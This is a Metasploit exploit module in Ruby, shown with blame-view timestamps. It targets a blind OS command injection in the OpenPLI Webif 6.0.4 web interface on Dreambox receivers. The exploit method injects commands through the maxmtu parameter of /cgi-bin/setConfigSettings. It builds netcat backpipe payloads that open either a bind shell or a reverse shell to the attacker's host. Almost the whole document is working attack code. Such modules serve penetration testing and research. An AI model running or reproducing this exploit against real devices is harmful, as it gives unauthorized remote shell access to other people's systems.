2013-02-16 19:42:02 +00:00
|
|
|
|
|
|
|
|
##
|
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
|
# http://metasploit.com/
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-02-16 19:49:32 +00:00
|
|
|
Rank = GreatRanking
|
|
|
|
|
|
2013-02-16 19:42:02 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => 'OpenPLI Webif v6.0.4 - Arbitrary Command Execution',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS Command injection.
|
|
|
|
|
|
|
|
|
|
Tested on the following box:
|
|
|
|
|
* Linux Kernel Linux version 2.6.9 (build@plibouwserver) (gcc version 3.4.4)
|
|
|
|
|
#1 Wed Aug 17 23:54:07 CEST 2011
|
|
|
|
|
* Firmware release 1.1.0, 27.01.2013
|
|
|
|
|
* FP Firmware 1.06
|
|
|
|
|
* Web Interface 6.0.4-Expert - PLi edition by [lite]
|
|
|
|
|
|
|
|
|
|
Note: This is a blind os command injection vulnerability. This means
|
|
|
|
|
that you will not see any output of your command. Try a ping command
|
|
|
|
|
to your local system for a first test.
|
|
|
|
|
},
|
|
|
|
|
'Author' => [ 'm-1-k-3' ],
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'URL', 'http://openpli.org/' ],
|
|
|
|
|
[ 'URL', 'http://openpli.org/wiki/Webif' ],
|
|
|
|
|
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ],
|
|
|
|
|
[ 'EDB', '24498' ],
|
|
|
|
|
[ 'OSVDB', '90230']
|
|
|
|
|
],
|
|
|
|
|
'Platform' => ['unix', 'linux'],
|
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
|
'Privileged' => true,
|
|
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'Space' => 1024,
|
|
|
|
|
'DisableNops' => true,
|
|
|
|
|
'Compat' =>
|
|
|
|
|
{
|
|
|
|
|
'PayloadType' => 'cmd',
|
|
|
|
|
'RequiredCmd' => 'netcat-e generic'
|
|
|
|
|
}
|
|
|
|
|
},
|
|
|
|
|
'Targets' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'Automatic Target', { }]
|
|
|
|
|
],
|
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
|
'DisclosureDate' => 'Feb 08 2013'
|
|
|
|
|
))
|
|
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
Opt::RPORT(80),
|
|
|
|
|
], self.class)
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
connect
|
|
|
|
|
|
|
|
|
|
payl = datastore['PAYLOAD']
|
|
|
|
|
|
2013-02-16 19:49:32 +00:00
|
|
|
uri = '/cgi-bin/setConfigSettings'
|
2013-02-16 19:42:02 +00:00
|
|
|
|
|
|
|
|
if payl =~ /bind/
|
|
|
|
|
cmd = Rex::Text.uri_encode("mknod /tmp/backpipe p; nc -l -p #{lport} 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe")
|
|
|
|
|
elsif payl =~ /reverse/
|
|
|
|
|
cmd = Rex::Text.uri_encode("mknod /tmp/backpipe p; nc #{lhost} #{lport} 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe")
|
|
|
|
|
else
|
|
|
|
|
#this is for typical command execution ... cmd/unix/generic
|
|
|
|
|
cmd = Rex::Text.uri_encode(payload.encoded)
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
vprint_status("#{rhost}:#{rport} - Sending remote command ... \nCommand: #{cmd}")
|
|
|
|
|
vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\n")
|
|
|
|
|
|
|
|
|
|
data_cmd = "?maxmtu=1500%26#{cmd}%26"
|
|
|
|
|
|
|
|
|
|
begin
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
|
{
|
|
|
|
|
'uri' => uri << data_cmd,
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
})
|
|
|
|
|
|
|
|
|
|
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
|
|
|
|
|
print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
|
|
|
|
|
return
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
if not res
|
|
|
|
|
print_error("#{rhost}:#{rport} - HTTP Connection Error, Aborting")
|
|
|
|
|
return
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
handler
|
|
|
|
|
disconnect
|
|
|
|
|
end
|
|
|
|
|
end
|
